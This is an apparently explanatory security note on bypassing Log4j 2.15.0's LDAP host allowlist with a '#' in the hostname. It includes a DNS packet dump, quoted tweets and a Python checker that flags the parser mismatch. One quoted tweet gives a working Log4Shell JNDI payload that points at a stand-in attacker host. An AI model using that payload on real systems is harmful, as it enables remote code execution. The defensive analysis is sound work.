e.g. `host 127.0.0.1#test.example.com` will perform a DNS query as shown below, although `#` is not a valid character in a domain name:

```text
0020   da 7c 01 00 00 01                                 .|....
0030   00 00 00 00 00 00 03 31 32 37 01 30 01 30 06 31   .......127.0.0.1
0040   23 74 65 73 74 07 65 78 61 6d 70 6c 65 03 63 6f   #test.example.co
0050   6d 00 00 01 00 01                                 m.....
```
Ref: https://twitter.com/marcioalm/status/1471740771581652995

> FIX: Here is a PoC in how to bypass allowedLdapHost and allowedClasses checks
> in Log4J 2.15.0 to achieve RCE: ${jndi:ldap://127.0.0.1#evilhost.com:1389/a}
> and to bypass allowedClasses just choose a name for a class in the JDK.
> Deserialization will occur as usual. #Log4Shell 1/n

https://twitter.com/Shaquil86300527/status/1472153790463815680

> In my tests, this doesn't work on Windows and Linux. It does work in MacOS and
> FreeBSD.
> # is not valid for DNS but *some* resolver might query names with # in it.
> TBC for this to work the vulnerable application must run on freeBSD or MacOS
> and the actor must control a DNS domain.
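The parser disagreement behind the bypass quoted above (a strict URI parser stops the host at `#` and sees `127.0.0.1`, while the resolver-facing side keeps `127.0.0.1#evilhost.com`), together with the check a defender would want in front of an allowlist, as an added Python example that is not Log4j's own code; the allowlist and the sample URLs are constructed for illustration.

```python
import re
from typing import Optional, Tuple
from urllib.parse import urlsplit

# Hosts an internal allowlist would accept (constructed; mirrors a "localhost only" policy).
ALLOWED_HOSTS = {"localhost", "127.0.0.1"}

# RFC 1123 hostname label: letters, digits and hyphens, no leading or trailing hyphen.
# A '#' anywhere in a label fails this pattern.
LABEL_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def host_seen_by_uri_parser(url: str) -> Optional[str]:
    """RFC 3986 view: '#' ends the authority, so 127.0.0.1#evilhost.com reads as host 127.0.0.1."""
    return urlsplit(url).hostname


def host_seen_by_naive_parser(url: str) -> str:
    """Resolver-facing view: everything after '//' up to the first ':' or '/' is the host,
    so the '#' and the suffix after it survive into the name that gets resolved.
    (Bracketed IPv6 literals are out of scope for this illustration.)"""
    rest = url.split("//", 1)[1] if "//" in url else url
    return re.split(r"[:/]", rest, maxsplit=1)[0].lower()


def is_valid_dns_name(host: str) -> bool:
    """Every dotted label must match LABEL_RE (dotted-quad IPv4 literals pass too)."""
    return all(LABEL_RE.match(label) for label in host.split("."))


def check_jndi_target(url: str) -> Tuple[bool, str]:
    """Permit the lookup only if both parsers agree on the host, the host is a
    syntactically valid DNS name or IPv4 literal, and it is on the allowlist."""
    strict = host_seen_by_uri_parser(url)
    naive = host_seen_by_naive_parser(url)
    if strict != naive:
        return False, f"host parse mismatch: {strict!r} vs {naive!r}"
    if not is_valid_dns_name(strict):
        return False, f"invalid hostname: {strict!r}"
    if strict not in ALLOWED_HOSTS:
        return False, f"host not allowlisted: {strict!r}"
    return True, "ok"


if __name__ == "__main__":
    for url in ("ldap://127.0.0.1:1389/a", "ldap://127.0.0.1#evilhost.com:1389/a"):
        print(url, "->", check_jndi_target(url))
```

Comparing the two views catches the `#` trick even on platforms whose resolver would happily send the name; an allowlist that trusts only one parser does not.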